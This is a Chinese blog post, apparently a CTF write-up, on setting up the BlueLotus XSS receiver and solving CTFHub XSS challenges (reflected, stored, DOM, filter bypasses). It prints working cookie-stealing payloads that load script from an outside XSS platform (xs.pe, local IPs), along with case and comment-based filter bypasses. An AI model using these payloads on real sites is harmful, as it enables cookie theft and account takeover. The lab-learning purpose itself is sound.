web基础之XSS

news2024/11/14 20:36:43

一、搭建XSS平台

安装

1、我这里安装在本地的Phpstudy上,安装过程就是一路下一步(可以改安装路径),附上下载链接:

# 官网:https://www.xp.cn/download.html

# 蓝莲花 - github下载
https://github.com/firesunCN/BlueLotus_XSSReceiver

phpstudy安装完成后启动服务

将解压后的BlueLotus_XSSReceiver原代码放置 phpstudy 安装目录的WWW文件夹

 然后在浏览器中输入:http://本机ip/BlueLotus_XSSReceiver-master   #  访问我们刚才拉到www文件夹下的BlueLotus_XSSReceiver文件,进入安装界面

2、配置XSS接收平台 - 蓝莲花

插入模板

填写接收数据的url ,格式:当前蓝莲花平台的url + 文件名(文件名自己取)

示例

最后选择生成paload

测试一下

3、将攻击语句复制保存下来,等下要用

<script src="http://127.0.0.1/BlueLotus_XSSReceiver-master/myjs/text.js"></script>

攻击演示

本地演示

突然想到一个问题,我刚才制作的攻击语句中的IP是本地的回环地址,所以如果我在虚拟机的靶场中测试攻击,那么我的蓝莲花平台是接收不到的,所以这里先在本地的靶场测试,等下在演示在虚拟机中的(如果蓝莲花平台部署在云服务器,就能攻击其他互联网用户)

解除输入框的字符限制

回到平台查看攻击

点击查看邮件信息 

虚拟机演示

ipconfig    # 查看本机ip

使用本机IP访问蓝莲花平台测试看看

重新构造攻击paload

<script src="http://192.168.100.58//BlueLotus_XSSReceiver-master/myjs/text.js"></script>

回到平台

二、反射型

(1)首先尝试用蓝莲花xss平台打cookie;但是不知道哪个步骤出现问题;老是获取不了cookie
示例:
payload:

image


获取响应:

image


结果:(就是没有cookie;不知道哪个环境出现问题)

image


(2)尝试了大佬的在线xss平台;成功了。自己重新搭建了一个另一个xss平台也成功拿到flag;需要在docker容器搭建,不演示了);但是蓝莲花的这个问题一直没有被解决;就是很垃圾!

在线xss平台:https://xssaq.com/(该平台主机上线有提示语音并且功能比蓝莲花和我搭建的另一个xss平台都好,所以就借助大佬搭建的xss平台作为本期演示平台)
成功拿到flag

image

三、存储型

(1)将payload上传到第一个输入框

image


此时主机上线不携带cookie

image


将url输入到第二个输入框;xss平台提示上线成功,此时携带cookie

image


还能看到当前的网页截屏

image

四、DOM反射

(1)首先插入<script>alert(1)</script>,发现攻击不成功,而返回的是;我们查看源码发现需要构造闭合

image


'></script><script>alert(1)</script>
发现成功了!

image


构造payload'></script><sCRiPt sRC=//xs.pe/cqW></sCrIpT>,获取flag

image

五、DOM跳转

(1)首先尝试,不成功;尝试构造js语句
http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800?jumpto=javascript:alert(1)
发现成功了,那么直接使用xss平台获取cookie
http://challenge-1ccc67ea8612a9b6.sandbox.ctfhub.com:10800/?jumpto=javascript:$.getScript("//xs.pe/cqW")
拿到flag

六、过滤空格

(1)使用paylod发现空格被过滤了<sCRiPt sRC=//xs.pe/cqW></sCrIpT>
(2)直接使用/**/代替空格即可绕过

<sCRiPt/**/sRC=//xs.pe/cqW></sCrIpT> 

image


拿到flag

image

七、过滤关键词

(1)正交提交脚本测试发现将scr开头的单词全部替换为空

image


(2)尝试了双写;不行;那就尝试一下大小写吧;好像可以;直接注入payload拿到flag

image

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2122154.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

报名啦|PolarDB数据库创新设计赛(天池杯)等你来战

2024年全国大学生计算机系统能力大赛PolarDB数据库创新设计赛&#xff08;天池杯&#xff09;现已正式启动报名&#xff0c;大赛面向全国普通高等学校全日制在读本专科学生&#xff0c;欢迎同学们踊跃参加&#xff01; 大赛介绍 2024年全国大学生计算机系统能力大赛PolarDB数…

C语言:刷题日志(3)

一.猴子选大王 一群猴子要选新猴王。新猴王的选择方法是&#xff1a;让N只候选猴子围成一圈&#xff0c;从某位置起顺序编号为1~N号。从第1号开始报数&#xff0c;每轮从1报到3&#xff0c;凡报到3的猴子即退出圈子&#xff0c;接着又从紧邻的下一只猴子开始同样的报数。如此不…

计算机二级自学笔记(选择题1部分)

A 问题规模越大&#xff0c;越需要多次的循环处理数据&#xff0c;不能说无关。 A 冒泡排序最坏次数n&#xff08;n-1&#xff09;/2&#xff0c;每一个数据都需要从最下方依次对比到最上方。 A 栈顶栈底指针都可以随操作而变化。头尾指针相同可能为空&#xff0c;循环队列可…

数据集 HO3D一种用于手和物体姿态的3D数据 >> DataBall

数据集 HO3D一种用于手和物体姿态的3D标注方法 手部姿态估计 姿态检测 HO-3D是一个包含手和物体在严重相互遮挡情况下的3D姿态注释的数据集。 数据集中的68个序列包含10个不同的人操作10个不同的物体&#xff0c;这些物体来自YCB物体数据集。当前数据集包含77,558张图像的注释…

Hive SQL查询汇总分析

目录 SQL查询汇总分析 成绩查询 查询编号为“02”的课程的总成绩 查询参加考试的学生个数 分组查询 查询各科成绩最高和最低的分 查询每门课程有多少学生参加了考试(有考试成绩) 查询男生、女生人数 分组结果的条件 查询平均成绩大于60分的学生的学号和平均成绩 查询至少…

后谷歌时代

每周跟踪AI热点新闻动向和震撼发展 想要探索生成式人工智能的前沿进展吗&#xff1f;订阅我们的简报&#xff0c;深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同&#xff0c;从行业内部的深度分析和实用指南中受益。不要错过这个机会&#xff0c;成为AI领…

【精彩回顾·成都】成都 UG 生成式 AI 工作坊:探索未来职场新边界!

文章目录 前言一、活动介绍二、精彩分享内容及活动议程2.1、亚马逊云科技社区情况和活动介绍2.2、《构建优势思维&#xff0c;打造高效团队》2.3、《成为有影响力的技术领导者》2.4、现场互动情况2.5、休息茶歇时间2.6、《向内探索-更多可能》2.7、《即刻起飞 —— 通过 Amazon…

一起对话式学习-机器学习01——贝叶斯学习

【一】声明 由于时间关系&#xff0c;这个系列主要推理内容可能大部分以手写笔记的形式展示&#xff0c;但是对于有大量公式形式及数学推导的科目来说&#xff0c;将更多的精力专注于对内容本身的理解中应该是更合理的。&#xff08;之后会规范字体QAQ&#xff09; 【二】贝叶斯…

骨传导耳机哪个牌子最好?五款热门高销骨传导耳机力荐

随着人们健康意识的增强和运动习惯的养成&#xff0c;骨传导耳机因其独特的优势逐渐成为许多运动爱好者的首选。然而&#xff0c;在众多品牌和型号中选择一款合适的骨传导耳机并非易事。市场上充斥着各种关于骨传导耳机的传言&#xff0c;这些传言有时会让消费者感到困惑&#…

C2P 因果推理链:让大模型具备人类级的因果推理能力

C2P 因果推理链&#xff1a;让大模型具备人类级的因果推理能力 C2P 框架创意翻译 论文&#xff1a;C2P: Featuring Large Language Models with Causal Reasoning 代码&#xff1a;https://anonymous.4open.science/r/C2P-5C2A/README.md C2P 框架 ├── C2P框架的主要子任务…

保姆级离线+windows环境+私有化部署大模型

基于gis数据的高敏感高保密性要求&#xff0c;相信gis的小伙伴都有如下的需求&#xff1a;在内网&#xff0c;无外网环境下&#xff0c;部署自己的私有化大模型。 1.环境背景&#xff1a; 没有Linux环境&#xff0c;只是windows 无外网&#xff0c;内网环境 2.安装部署过程…

【第27章】Spring Cloud之适配Sentinel

文章目录 前言一、准备1. 引入依赖2. 配置控制台信息 二、定义资源1. Controller2. Service3. ServiceImpl 三、访问控制台1. 发起请求2. 访问控制台 总结 前言 Spring Cloud Alibaba 默认为 Sentinel 整合了 Servlet、RestTemplate、FeignClient 和 Spring WebFlux。Sentinel…

光伏电站的工程量造价怎么算的

光伏电站的工程量造价怎么算的 光伏电站的工程量造价是一个复杂且多变的过程&#xff0c;受多种因素影响&#xff0c;包括项目规模、设备选型、施工条件、地区差异、原材料价格波动等。以下是对光伏电站工程量造价的详细分析&#xff1a; 造价的构成&#xff1a; 设备的费用&…

分享人工智能训练师不同级别对应职位和薪酬

2024年4月&#xff0c;九部委联合发文《加快数字人才培育支撑数字经济发展行动方案&#xff08;2024—2026年&#xff09;》的通知&#xff08;以下简称“通知”&#xff09;。 重点将人工智能领域人才培养放在首位&#xff0c;可见人工智能训练师作为连接技术与应用的桥梁…

信息熵+互信息(信息增益)

文章目录 信息增益信息量信息熵条件熵信息增益 交叉熵->信息熵->KL散度 信息增益 信息量 信息奠基人香农&#xff08;Shannon&#xff09;认为“信息是用来消除随机不确定性的东西”&#xff0c;也就是说衡量信息量的大小就是看这个信息消除不确定性的程度。 “太阳从…

代码随想录27期|Python|Day51|​动态规划|​115.不同的子序列|​583. 两个字符串的删除操作​|

115. 不同的子序列 本题是在原来匹配子序列的基础上增加了统计所匹配的子序列个数&#xff0c;也就是dp数组的定义和更新公式和原来的有所区别。 1、dp数组的定义 dp[i][j]表示以i-1和j-1为末尾的字符串中&#xff0c;给定字符串s包含目标字符串t的个数。注意这里不是长度。…

JMeter做接口测试,如何提取登录Cookie

用JMeter进行接口测试时&#xff0c;经常需要通过登录接口提取Cookie才能进行其他业务流程&#xff0c;如果cookie/token是在登录请求的响应报文里&#xff0c;那么可以通过正则表达式直接提取出来&#xff0c;但是如果Cookie不是在响应报文里&#xff0c;还可以怎么提取出来呢…

牛客小白月赛100(下)

ACM中的C题 题目描述 登录—专业IT笔试面试备考平台_牛客网 运行代码 #include<iostream> using namespace std; int main() {int n;cin>>n;if(n1)cout<<-1;else if(n%20)cout<<n/2;elsecout<<n/21; } 代码思路 一、总体思路 这段代码的目…

第二百二十一节 JPA教程 - JPA按ID查找示例

JPA教程 - JPA按ID查找示例 一旦我们将实体保存到数据库中&#xff0c;我们可以通过使用EntityManager中的find方法来检索它们。 以下代码显示如何使用find方法与实体id。 Person emp em.find(Person.class, 1L);例子 下面的代码来自Person.java。 package cn.w3cschool.…